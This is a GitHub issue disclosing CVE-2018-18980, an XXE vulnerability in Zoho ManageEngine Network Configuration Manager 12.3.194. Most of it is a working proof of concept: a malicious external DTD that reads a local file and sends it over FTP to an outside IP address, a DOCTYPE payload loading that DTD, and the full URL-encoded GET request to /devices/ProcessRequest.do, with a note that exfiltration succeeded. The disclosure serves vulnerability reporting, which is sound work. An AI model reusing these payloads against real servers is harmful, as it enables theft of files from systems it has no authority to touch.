Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[CVE-2018-18980]Zoho ManageEngine Network Configuration Manager 12.3.194 XXE vulnerability #5

Open
x-f1v3 opened this issue Oct 30, 2018 · 0 comments

Comments

@x-f1v3
Copy link
Owner

x-f1v3 commented Oct 30, 2018

Zoho ManageEngine Network Configuration Manager 12.3.194 XXE vulnerability

Date: 2018/09/19
Software Link: https://www.manageengine.com/network-configuration-manager/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: jacky.xing@dbappsecurity.com.cn

A XML External Entity injection(XXE) vulnerability
exists in Zoho ManageEngine Network Configuration Manager 12.3.194 via the RequestXML parameter in a /devices/ProcessRequest.do GET request.

My vps’s evil.xml

<!ENTITY % file SYSTEM "file:///c:\test.txt">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'ftp://69.194.9.178:2121/%file;'>">
%int;
%send;

image

I used the Ftp protocol to read file, it can read the file c:\test.txt.

The test.txt is just for test.
image

Then i used the poc to request my vps’s evil.xml.

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://69.194.9.178/xxe/evil.xml">%remote;]><root></root>

The vulnerability exists in the /devices/ProcessRequest.do?RequestID=463&RequestXML=,so i tested it by the poc which was urlencoded.

http://127.0.0.1:8060/devices/ProcessRequest.do?RequestID=463&RequestXML=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE%20root%20%5B%3C%21ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2f%2f69.194.9.178%2fxxe%2fevil.xml%22%3E%25remote%3B%5D%3E%3Croot%3E%3C%2froot%3E

In my vps ,i used the python script to open ftp protocol for accepting data
image

When i sent the request , I accepted the content of test.txt in my vps.
image
image

@x-f1v3 x-f1v3 changed the title Zoho ManageEngine Network Configuration Manager 12.3.194 XXE vulnerability [CVE-2018-18980]Zoho ManageEngine Network Configuration Manager 12.3.194 XXE vulnerability Nov 6, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant